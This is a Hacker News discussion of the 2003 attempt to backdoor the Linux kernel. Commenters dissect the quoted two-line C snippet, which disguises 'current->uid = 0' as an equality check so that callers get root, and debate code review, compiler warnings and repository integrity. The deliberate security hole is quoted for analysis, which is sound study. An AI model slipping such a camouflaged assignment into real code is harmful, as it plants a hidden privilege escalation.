Hacker News new | past | comments | ask | show | jobs | submit login
The Linux Backdoor Attempt of 2003 (freedom-to-tinker.com)
159 points by Tsiolkovsky on Oct 9, 2013 | hide | past | favorite | 63 comments



Ehh. I think this article overstates just how clever this backdoor is. With the entire kernel source to play with, and the underlying assumption that the CVS change would pass into BitKeeper without a thorough review, there had to be much more subtle ways to insert a local privilege escalation.

Besides, it's not as if Linux local privilege escalations are incredibly rare, and it would be surprising if anyone with enough money, time and expertise couldn't uncover them at a rate sufficient to make this kind of skulduggery unnecessary.


Hi, guy who discovered the back door here.

The flow was always BitKeeper => CVS, not CVS => BitKeeper.

The only way this change would have made it into BK is if one of the users of CVS tree modified the same area of code and included that change in a patch sent to Linus or one of the other BK users. The chances of that happening and not being caught in review were, in my opinion, zero. Ziltch. Just not possible, any reasonable programmer would have seen this.

To this day I believe this was a script kiddy who broke in and wanted to see if he could stick a trojan in there and get root on machines that installed this code. Seems dicey at best because while some people used the CVS stuff at the time, all the releases were done from BK at that time so that code would have never hit mainstream distros.


Although you might feel motivated to deride the attacker, I think it's safe to say that this person was skilled beyond "script kiddy".


I'm old so maybe the meaning of "script kiddy" has evolved, but back in the day my understanding is that term applied to people who did this sort of thing. Maybe I misunderstand the term, hacking into machines is certainly not my area of expertise.


To my understanding, the meaning of "script kiddie" hasn't changed much over time. It still means:

Someone who breaks into computers by merely executing the scripts and hacking tools written by others, without any coding on their own, and without any deep knowledge about that attack.

See also: https://en.wikipedia.org/wiki/Script_kiddie


OK, so I was wrong. Not sure what to call the person who did the backdoor then (nor why it is a big deal). But whatever, I used the wrong term, sorry.


Anyway luckydue - good spotting in finding it those years ago and thanks for all your effort. As a linux user, I appreciate the effort all the linux hackers make.


The Linux kernel guys are an impressive bunch. I've helped but I'm not in their league. I did BitKeeper to help Linus. He's a great programmer, architect, and manager, and in ~25 years in the industry I've never met another guy with his skill set.

In spite of all the shit I've taken for the choices I have made, I'd do it all over again to help Linus. That guy is unique. I know you guys like him but I think few people really realize how unique he is. He's a big deal, I am not.


What's clever about that code is that the conditional will always fail. The assignment expression setting the uid to 0 will itself evaluate to 0, which will cause the conjunction to evaluate to "false." On first glance, the code makes you believe that the body of the conditional is necessary, when it's in fact dead code. That's nice camouflage.


I like the extra parens in the if condition. It's genius.

On the face of it, it appears that the parens are to ensure correct operator precedence because a bitwise OR is used (a common idiom because bitwise operators have the wrong precedence versus comparison in C).

But that's not what the parens are really for! They are there because gcc complains about assignments inside of conditionals unless you put parens around it.


Also clever is the fact that the first clause acts as a password, so that the backdoor opens only if called with the supposedly invalid option combination.


The hack itself is primitive (I guess most of the obfuscation contest entrants used this trick at least once), but hacking into the official CVS repository looks more suspicious. More so that nobody have noticed/reported this break in.


I think I done this "hack" several times when I started coding and scratched my head for a while before realising I was missing an equality sign!


Hah, that's what make this "hack" so popular - it's very easy to miss, even for seasoned programmers, when just glancing at a code.


I remember this appearing on an exam in my C class back in '89 or so. It was basically "What does this code output...", and had "if (a = 3)" instead of "if (a == 3)". Thing is, I recognized the mistake, and though the instructor made a typo. So I answered based on what I thought the instruct had meant. Of course I got the question wrong. (I was fairly cocky back then, and normally I would have answered the question at face value just to "be that way", but I was trying to break that bad habit and it ended up back-firing on me anyway).


  if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
        retval = -EINVAL;
> ...A casual reading by an expert would interpret this as innocuous error-checking code...

Wait... Wait... A casual reading by any expert should result in the question "why is this code setting current->uid to 0?"

After all, in case said expert has forgotten the difference between = and ==, this little bit of code all by itself has two correct reminders about what those operators actually do.


Although I noticed it judging by the amount of times I've fell for those 'check the error in this sentence' games I would assume that if you're reading a lot of code and you see the 'if' you would subconsciously interpret it as two equals signs.


Even better: Emacs has cwarn-mode, which by default highlights = (assignment-equal) in tests in BRIGHT RED. I'm sure Vim has something similar; maybe the customized version of uEmacs/PK 4.0.15 Linus uses does not.

http://www.emacswiki.org/emacs/CWarnMode

http://en.wikipedia.org/wiki/MicroEMACS

http://web.archive.org/web/20061124122032/http://www.stifflo...


Most IDEs do that today - but I wonder how many did that in 2003?


The author is talking down and assumes too many people just learned C yesterday. An assignment of a variable called uid to 0 inside of an error check is waaaay too transparent. It's impressive that it made it into the cvs server with no history but the actual weakness relies heavily on nobody ever looking at the code. It would be spotted right away by anyone remotely competent who glanced over it.


    It would be spotted right away by anyone
    remotely competent who glanced over it.
I'm not so sure. I'm a professional programmer mostly working in C++, and I didn't see the problem on first read-through. It took looking carefully before I saw it, and if I hadn't already known that these two lines contained a vulnerability I might not have noticed. I could see this being missed in a code review.


Going back to my earlier point, its success relies on people not seeing it. So I would think its ability to pass a code review would ultimately depend on how many other lines of code it has to hide amongst. If you are reviewing a huge diff and this is hiding somewhere, then OK, maybe I buy it, but it's pretty transparently wrong.

Another test it fails: even if it were == as they are trying to make people think, why would this return EINVAL only if the user is root? There aren't a lot of real world examples where you would want that. It pops out right away as a bogus check that makes no sense, and surprise surprise, it also sets the uid to 0, my guess is in a place where it makes no sense to even look at uid, and very superficially hiding as a "rookie mistake"...


Any professional programmer should be hesitant making claims like this: it's easy to see if you have an isolated fragment and are primed to be thinking about security. It's a much different story if you received something like this as part of a big patch and making an effort to be particularly vigilant. We have a such a long history of finding bugs like this which made it into production because this is an easier mistake to make than you claim.

It's easy to thump your chest and assume that you're smarter than those developers (which is almost certainly wrong) but that misses the underlying lesson that humans will make mistakes and the likelihood goes up with the complexity of the task. That can be switching to a language which bans problematic behaviour, automatic use of linters and other tools, rigorous code reviews, etc. but in each case you're making environment safer rather than trying to find perfect developers.


I suspect you are taking my comment as a personal insult rather than reading it for the meaning I intended. The point I was trying to make is that the skill involved here was hiding the lines in a large source tree and hiding the history. The actual lines of code are unremarkable, absurdly incorrect when taken in isolation, and not where the clever part of this attack lies. The author of the article is stating it as something else.

See also my reply to cbr where I make essentially your same point: the way to get this past a code review is make it part of a large diff.


It's not so much a personal insult as the common tendency most people have to base decisions on best rather than average performance. This essentially devolves to the Deming/TQM/Toyota/etc. school of management where you focus on making the system tolerate human error rather than hoping your humans consistently perform well.

That said, I do disagree that this is easily detected – I would bet that a significant percentage of C developers would not notice this if it wasn't mentioned in the context of a security problem. Linux kernel developers are [hopefully] well above average but … there's a reason why so many style guidelines feature this one prominently and it's not because few people have made this mistake.


Surprised at downvotes. Putting foo = 0 in a test for an if statement is something that even I can spot, and I am not a professional programmer and have had no formal training in programming other than an Algo 60 course at University way back in the last century.

The author of the code if malicious must have realised that it would not pass any kind of code review.

PS: I tend to discount 'tone' when reading blog pages as getting the 'tone' right is the kind of thing professional authors do.


As a professional programmer, I spotted the error on my first read through, but it wasn't a fair test because the code wouldn't have been there if there wasn't a problem. Had I just been scanning the code quickly without being in a state where I was alerted to look for an issue I have no idea if I would have seen it.

In any case, this is something a competent lint tool or static code analyzer would warn about, which makes a good case for people using such tools as part of their normal process.


Quite disturbing to think about it. There are probably millions of lines of code in the kernel, how confidently can you say that there's no other instance of something like this slipping in? I mean it's just one damn '=' character.


The more I think about it, the more programming (and computers in general) frustrate me. In the non-digital world, the general rule is small mistakes lead to small consequences (for example, overcooking food will result in it burning and getting worse over time).


But not watching your cooking process can also result to blowing up whole building due to gas explosion. More often it would be just bad meal, of course. But more often small mistake in a program will just result to a compile error or bad behavior.


Isn't this also what makes computers so wonderful? Small amounts of code let you do amazing things.


A piece of telco software had been written in C language, a standard language of the telco field. Within the C software was a long "do... while" construct. The "do... while" construct contained a "switch" statement. The "switch" statement contained an "if" clause. The "if" clause contained a "break." The "break" was supposed to "break" the "if clause." Instead, the "break" broke the "switch" statement.

Ctrl-F the above phrase in

http://www.mit.edu/hacker/part1.html

Security concerns always seem to involve low level code in device drivers or firmware. Indeed, one character in the wrong place and we have problems


Also, that statement is guaranteed to be wrong. You don't "break" if clauses. But hey, it's about hackers and on mit.edu, it must be correct :)


Yes, I thought that the 'break' keyword wasn't used in if clauses. I took it to mean a problem with line ending resulting in the premature closure of the switch block. Anyone any ideas as to possible syntax?


It would make sense if the author had meant do clause instead of if clause.

Something like that:

  do {
    switch (bleh) {
      case MEH:
        if (derp) {
          break; /* supposed exit the do..while loop early...
                    except it only exits the switch statement */
        }
        [...]
        break; /* usually there's a break at the end of each
                  case statement, but the programmer might
                  not have seen it if it's far away */
    [...]
    }
    fun_stuff(); /* not supposed to be called when
                    bleh == MEH and derp is non-null */
  } while (quux);


"how confidently can you say that there's no other instance of something like this slipping in? "

Well, you have compilers that displays you warnings about it. If you don't catch the error you have static analyzers, if not you have Valgrind and other memory tools(linux have some jewels here), and if not you have your own parsing code for automatic checking of anything suspicious like becoming superuser.

So is not that disturbing as this example is something that even gcc with Waring=all catch. LLVM is better in this respect.


I wonder how many millions of dollars of damage has been done by the bone-headed equality/assignment syntax in C?


The problem is overstated, but using := (or ->, or whatever) for assignment and = for comparison hasn't ever seemed like a bad idea.


There was no shortage of non-proft, non-nation-state actors engaging in backdooring open source and commercial codebases during this time. No reason to believe this was related to the NSA.


I agree, I've worked with the NSA (early 1990's when they still had some ethics) and this hack doesn't feel like what they would do.

I'm not an NSA expert though, I declined to get clearance, so salt my opinion a bit.


Doesn't compiler complain about assignment in condition?


Only when unparenthesized (e.g, if (x = 0) { ... }, but not if ((x = 0)) { ... }). And the author of this mysterious bit of code has helpfully thrown some parentheses around the assignment...


I don't see any warnings when compiling "if (1 && (i = 2)) {...}", but there is an warning when compiling "if (i = 2) {...}". This is using gcc 4.7.2 with -Wall.


Both gcc and clang appear to lack any way to generate a warning in the first case. Something like splint (http://www.splint.org) does, which is a good argument for including that into a C developer's workflow.


clang and gcc don't warn on this because real large codebases have an (unfortunate?) number of assignments inside boolean expressions. Most of them are intentional and at least some significant fraction are correct.

Taking advantage of assignment-as-an-expression is idiomatic in a fair amount of code I've seen, at least.

Stuff like:

    /* check_something returns non-zero on error */
    if (need_to_check && (status = check_something())) {
        handle_error(status);
    }
The clang and gcc folk tend to avoid adding default (or even -Weverything) warnings that will trigger on entirely valid, at least marginally common code, even if the style choice is problematic.


> clang and gcc don't warn on this because real large codebases have an (unfortunate?) number of assignments inside boolean expressions

Definitely. I personally find that style bad because it's concealed a far number of bugs in the past (either things like the =/== confusion or simply logic errors when the line became long enough that scanning it is non-trivial) but the only way that could fly for a compiler would be as a flag or pragma allowing you to opt-in for valid-but-discouraged style warnings and that's served well enough by existing linters that standardization isn't worth the cost of moving it into a compiler.


this is pretty interesting, thanks for posting.


Are those options for wait2 in common use, causing auto-elevation for many programs? It seems too easily accessed to be an NSA backdoor.


We seem to have forgotten that the NSA is not the only or even necessarily the most interesting entity looking to privilege-escalate and/or steal data. Corporations and individuals are malicious also.


We still dont have a report on the kernel.org hack of 2011.

Many people say, calm down, its git they cant have inserted backdoors etc without messing up the git history/changelog/hashes/whatever. But what if, git was modified and backdoored previously to hide some objects/changes? How would such an attack work? Lets say you discover a problem in git, which allows you to omit changesets in its output. How would that work to backdoor the kernel?


Older versions of git would tell you the hashes were wrong. Implementations of git in other languages would tell you the hashes were wrong. Manually checking would tell you the hashes were wrong. It's just not feasible.

EDIT: Plus, git is stored in git, so you'd need to backdoor git first... ;)



Thanks for the link... I've never read the README before, and it's very entertaining. Now I'm going to have "goddamn idiotic truckload of sh*t" echoing through my head all day


I read, when the project was introduced, but forgotten it a long time ago. Goddamn Idiotic Truckload of Sh*t Hub, Inc. would make a memorable name for an incorporation.


Also, the source of git would also reveal a problem when examined. To get around that one starts hypothesizing the sort of globe-spanning conspiracy against which one might as well give up ("well, maybe all my compilers (not just gcc, all of them) are also backdoored to backdoor themselves, and each other if you cross-compile, then backdoor git too...").


This summer: One man looked too deeply into the source code of his compilers and didn't like what he found.


Quickly, damon_c! To Kickstarter!


The kernel hasn't always been tracked in git though. How would we know something wasn't added before the source was imported into git?


Because before it was tracked by git, it was in bitkeeper, and it was likely in some other system before that.


I understand that. But what I don't know are the capabilities of those other, older systems that once tracked the kernel source. Do we have the same assurances there?


Great question.

BitKeeper wasnt as good as git when it comes to changesets and introducing bugs, still it was founded on more social side of changes needing approvals. Before that it was CVS and for that its almost easy to introduce backdoors.


Besides the whole source code compromise discussion I would really want to know whether there is any incident report planned.

Until the redesign kernel.org stated: "We will be writing up a report on the incident in the future.".

But since the compromise was more than 2 years ago it seems unlikely.


Such changes would be visible when comparing locally stored tree of older sources with new, supposedly backdored official sources stored on github. Someone should surely notice undocumented changes while doing backports, kernel upgrades etc. Heck, even integrity check by 3rd party tools could help here.




Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: